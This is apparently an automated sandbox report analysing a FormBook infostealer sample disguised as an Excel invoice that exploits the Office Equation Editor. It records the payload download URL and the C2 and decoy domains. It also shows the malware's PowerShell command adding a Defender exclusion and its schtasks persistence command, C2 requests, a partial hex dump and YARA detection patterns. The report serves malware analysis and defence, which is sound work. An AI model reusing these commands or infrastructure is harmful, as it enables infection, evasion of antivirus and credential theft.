Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PROFORMA INVOICE.xlsx

Overview

General Information

Sample Name:PROFORMA INVOICE.xlsx
Analysis ID:626593
MD5:5b9ddbdf0a0af0788eeceeacec2f0295
SHA1:77687d59abbd0b3c4eecc80abbe30d33a47e781c
SHA256:e11f7d510b899e00e0cf10dc360400fd38f180e9c72f42c465c3a470075cd9ea
Tags:VelvetSweatshopxlsx
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: EQNEDT32.EXE connecting to internet
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Sigma detected: File Dropped By EQNEDT32EXE
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Shellcode detected
Office equation editor drops PE file
Tries to detect virtualization through RDTSC time measurements
Adds a directory exclusion to Windows Defender
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Sample uses process hollowing technique
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
.NET source code contains method to dynamically call methods (often used by packers)
Queues an APC in another process (thread injection)
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Office equation editor establishes network connection
Drops PE files to the user root directory
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
HTTP GET or POST without a user agent
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Contains functionality to download and execute PE files
Checks if the current process is being debugged
Drops PE files to the user directory
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
Contains functionality for execution timing, often used to detect debuggers
Searches the installation path of Mozilla Firefox
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Office Equation Editor has been started
Contains functionality to download and launch executables
Potential document exploit detected (performs HTTP gets)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 2816 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
  • EQNEDT32.EXE (PID: 2212 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • vbc.exe (PID: 1200 cmdline: "C:\Users\Public\vbc.exe" MD5: F7ECD12D134AAF3541396C78337CE672)
      • powershell.exe (PID: 2532 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • schtasks.exe (PID: 2452 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp7282.tmp MD5: 2003E9B15E1C502B146DAD2E383AC1E3)
      • vbc.exe (PID: 1072 cmdline: C:\Users\Public\vbc.exe MD5: F7ECD12D134AAF3541396C78337CE672)
        • explorer.exe (PID: 1860 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • mstsc.exe (PID: 172 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: 4676AAA9DDF52A50C829FEDB4EA81E54)
            • firefox.exe (PID: 1720 cmdline: C:\Program Files (x86)\Mozilla Firefox\Firefox.exe MD5: C2D924CE9EA2EE3E7B7E6A7C476619CA)
  • cleanup
{"C2 list": ["www.admincost.com/n6g4/"], "decoy": ["bw589jumpb.xyz", "lojas-marias.com", "gadgersvip.com", "zeavd.com", "moment4miracles.com", "wildcanetours.com", "executivetravelandlogistics.com", "uspplongee.com", "schilova.online", "smoothie-optics.com", "masterima.net", "kickball.site", "theastralark.com", "nick-sylvestro.com", "properscooter.com", "wave-thermodynamics.com", "bitcollide.com", "xed5555.com", "tsue-sangyo.com", "lucianaejoaoalberto.com", "6084pinelake.info", "plentyhearty.com", "findmylostphone.me", "cliffpassphotographyllc.com", "goddessboi.com", "vulkan-platinum-online.info", "jumpn-giveaway.online", "linymar.xyz", "topgir.site", "oifreunion.com", "lewks.beauty", "servellobody.com", "eagle-five.com", "agelessfish.com", "daulat-kantorbahasamalut.com", "zombarias.com", "chimneyrepairbiloxi.com", "starline-pools.com", "financeenovationinc.com", "sakvoyge.online", "46458.pet", "babyminer.xyz", "alcosto.club", "aeroyogabrasil.com", "cellphstudy.com", "bldh45.xyz", "sguoffcampusrentals.com", "nehalooks.com", "employeebnsf.com", "duniacuan.online", "running-diary.site", "o-taguro.com", "iacli.run", "cariniclinicalconsulting.com", "btcspay.xyz", "funaoka-watanabedent.com", "jamesreadtanusa.com", "dems-clicks.com", "dowsjonesc.top", "joseikinmadoguchi.com", "hulizb6.com", "luxurybathshowers.com", "kapamilla.com", "duowb.com"]}
SourceRuleDescriptionAuthorStrings
00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b987:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18809:$sqlite3step: 68 34 1C 7B E1
    • 0x1891c:$sqlite3step: 68 34 1C 7B E1
    • 0x18838:$sqlite3text: 68 38 2A 90 C5
    • 0x1895d:$sqlite3text: 68 38 2A 90 C5
    • 0x1884b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18973:$sqlite3blob: 68 53 D8 7F 8C
    0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x24c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x24fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x32345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x31df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x32447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x325bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x259ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x3106c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x26732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x37987:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x38a9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 37 entries
      SourceRuleDescriptionAuthorStrings
      9.0.vbc.exe.400000.9.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        9.0.vbc.exe.400000.9.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1ab87:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        9.0.vbc.exe.400000.9.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a09:$sqlite3step: 68 34 1C 7B E1
        • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a38:$sqlite3text: 68 38 2A 90 C5
        • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
        4.2.vbc.exe.3842f58.9.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          4.2.vbc.exe.3842f58.9.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0xd7b20:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xd7eba:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x102940:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x102cda:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x12c760:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x12cafa:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0xe525d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x11007d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x139e9d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0xe4d09:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x10fb29:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x139949:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0xe535f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x11017f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x139f9f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0xe54d7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x1102f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x13a117:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xd88d2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1036f2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x12d512:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          Click to see the 20 entries

          Exploits

          barindex
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 198.12.89.166, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2212, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49173
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2212, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe
          No Snort rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://www.dems-clicks.com/n6g4/?Rju=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&ohA=4hdXYFAHAvira URL Cloud: Label: malware
          Source: http://www.employeebnsf.com/n6g4/?ohA=4hdXYFAH&Rju=/8Ga1vKBK5Zv+SvpDfc9R87wDDB6IH5FC+aL3DgDAA8ZWL71dgMkGG8I5dFlam/RYjehgQ==Avira URL Cloud: Label: malware
          Source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.admincost.com/n6g4/"], "decoy": ["bw589jumpb.xyz", "lojas-marias.com", "gadgersvip.com", "zeavd.com", "moment4miracles.com", "wildcanetours.com", "executivetravelandlogistics.com", "uspplongee.com", "schilova.online", "smoothie-optics.com", "masterima.net", "kickball.site", "theastralark.com", "nick-sylvestro.com", "properscooter.com", "wave-thermodynamics.com", "bitcollide.com", "xed5555.com", "tsue-sangyo.com", "lucianaejoaoalberto.com", "6084pinelake.info", "plentyhearty.com", "findmylostphone.me", "cliffpassphotographyllc.com", "goddessboi.com", "vulkan-platinum-online.info", "jumpn-giveaway.online", "linymar.xyz", "topgir.site", "oifreunion.com", "lewks.beauty", "servellobody.com", "eagle-five.com", "agelessfish.com", "daulat-kantorbahasamalut.com", "zombarias.com", "chimneyrepairbiloxi.com", "starline-pools.com", "financeenovationinc.com", "sakvoyge.online", "46458.pet", "babyminer.xyz", "alcosto.club", "aeroyogabrasil.com", "cellphstudy.com", "bldh45.xyz", "sguoffcampusrentals.com", "nehalooks.com", "employeebnsf.com", "duniacuan.online", "running-diary.site", "o-taguro.com", "iacli.run", "cariniclinicalconsulting.com", "btcspay.xyz", "funaoka-watanabedent.com", "jamesreadtanusa.com", "dems-clicks.com", "dowsjonesc.top", "joseikinmadoguchi.com", "hulizb6.com", "luxurybathshowers.com", "kapamilla.com", "duowb.com"]}
          Source: PROFORMA INVOICE.xlsxVirustotal: Detection: 35%Perma Link
          Source: PROFORMA INVOICE.xlsxReversingLabs: Detection: 24%
          Source: Yara matchFile source: 9.0.vbc.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.3842f58.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.0.vbc.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000009.00000002.1069848663.0000000000140000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1175795140.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.995456995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1069986638.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.999123801.0000000003842000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1028504490.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1178186749.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000000.1039502497.000000000B6A9000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000002.1069951838.0000000000380000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000D.00000000.1174695923.00000000000C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000009.00000000.995827598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1178294756.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.1178354979.0000000000260000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\Public\vbc.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exeJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exeJoe Sandbox ML: detected
          Source: 9.0.vbc.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.vbc.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.2.vbc.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 9.0.vbc.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits

          barindex
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXENetwork connect: IP: 198.12.89.166 Port: 80Jump to behavior
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
          Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000009.00000003.997655136.00000000006E0000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.1070445189.00000000009F0000.00000040.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.996323896.0000000000580000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.1070186270.0000000000870000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe
          Source: Binary string: mstsc.pdb source: vbc.exe, 00000009.00000002.1070927704.0000000001140000.00000040.10000000.00040000.00000000.sdmp, vbc.exe, 00000009.00000003.1067795163.0000000001140000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.1068222397.0000000002C30000.00000004.00000800.00020000.00000000.sdmp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 11_2_000D1660 FindFirstFileW,FindNextFileW,FindClose,11_2_000D1660

          Software Vulnerabilities

          barindex
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03690401 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03690401
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03690462 ShellExecuteExW,ExitProcess,2_2_03690462
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03690396 LoadLibraryW,URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03690396
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0369044B ShellExecuteExW,ExitProcess,2_2_0369044B
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_0369030A URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_0369030A
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03690480 ExitProcess,2_2_03690480
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03690326 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03690326
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036902F1 ExitProcess,2_2_036902F1
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_036903B0 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_036903B0
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.12.89.166:80
          Source: global trafficDNS query: name: www.employeebnsf.com
          Source: C:\Users\Public\vbc.exeCode function: 4x nop then pop edi9_2_00417317
          Source: global trafficTCP traffic: 192.168.2.22:49173 -> 198.12.89.166:80

          Networking

          barindex
          Source: C:\Windows\explorer.exeDomain query: www.employeebnsf.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.171 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 5.183.8.183 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.dems-clicks.com
          Source: Malware configuration extractorURLs: www.admincost.com/n6g4/
          Source: global trafficHTTP traffic detected: GET /n6g4/?ohA=4hdXYFAH&Rju=/8Ga1vKBK5Zv+SvpDfc9R87wDDB6IH5FC+aL3DgDAA8ZWL71dgMkGG8I5dFlam/RYjehgQ== HTTP/1.1Host: www.employeebnsf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /n6g4/?Rju=oW3KVVYfOUtMWnx9E4fO+4eOl+SZoa0wNCifvEB8Y9jnCg3EyPPrm8173PHAA8seoyylQg==&ohA=4hdXYFAH HTTP/1.1Host: www.dems-clicks.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 14 May 2022 13:10:55 GMTServer: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29Last-Modified: Sat, 14 May 2022 08:24:47 GMTETag: "b2a00-5def4862be45b"Accept-Ranges: bytesContent-Length: 731648Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4f 67 7f 62 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 20 0b 00 00 08 00 00 00 00 00 00 0a 3f 0b 00 00 20 00 00 00 40 0b 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 0b 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b8 3e 0b 00 4f 00 00 00 00 40 0b 00 c4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0b 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 1f 0b 00 00 20 00 00 00 20 0b 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 05 00 00 00 40 0b 00 00 06 00 00 00 22 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 0b 00 00 02 00 00 00 28 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ec 3e 0b 00 00 00 00 00 48 00 00 00 02 00 05 00 88 b9 01 00 80 47 01 00 03 00 00 00 9d 00 00 06 08 01 03 00 b0 3d 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 1b 00 00 0a 00 00 2a 46 02 28 1b 00 00 0a 00 00 02 03 28 07 00 00 06 00 2a 2a 02 03 28 1c 00 00 0a 00 00 2a 2e 02 03 04 28 1d 00 00 0a 00 00 2a 2e 02 03 04 28 1e 00 00 0a 00 00 2a 1e 02 7b 01 00 00 04 2a 22 02 03 7d 01 00 00 04 2a 26 02 28 01 00 00 06 00 00 2a 46 02 28 01 00 00 06 00 00 02 03 28 07 00 00 06 00 2a 2a 02 03 28 03 00 00 06 00 00 2a 2e 02 03 04 28 04 00 00 06 00 00 2a 2e 02 03 04 28 05 00 00 06 00 00 2a 00 13 30 02 00 18 00 00 00 01 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 6f d4 01 00 06 0b 2b 00 07 2a 13 30 02 00 18 00 00 00 02 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 6f d7 01 00 06 0b 2b 00 07 2a 13 30 02 00 19 00 00 00 03 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 03 6f da 01 00 06 0b 2b 00 07 2a 00 00 00 13 30 02 00 19 00 00 00 03 00 00 11 00 28 c2 01 00 06 02 6f 1f 00 00 0a 0a 06 03 6f d9 01 00 06 0b 2b 00 07 2a 00 00 0
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03690401 URLDownloadToFileW,ShellExecuteExW,ExitProcess,2_2_03690401
          Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
          Source: Joe Sandbox ViewASN Name: INTERXSCH INTERXSCH
          Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
          Source: EQNEDT32.EXE, 00000002.00000002.969951865.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.12.89.166/55/vbc.exeg
          Source: EQNEDT32.EXE, 00000002.00000002.969988460.0000000000669000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.12.89.166/55/vbc.exehhC:
          Source: EQNEDT32.EXE, 00000002.00000002.970273455.0000000003690000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.12.89.166/55/vbc.exej
          Source: EQNEDT32.EXE, 00000002.00000002.969951865.0000000000644000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.12.89.166/55/vbc.exen
          Source: explorer.exe, 0000000A.00000000.1034409224.00000000046D0000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 0000000A.00000000.1055600196.0000000003B10000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://investor.msn.com/
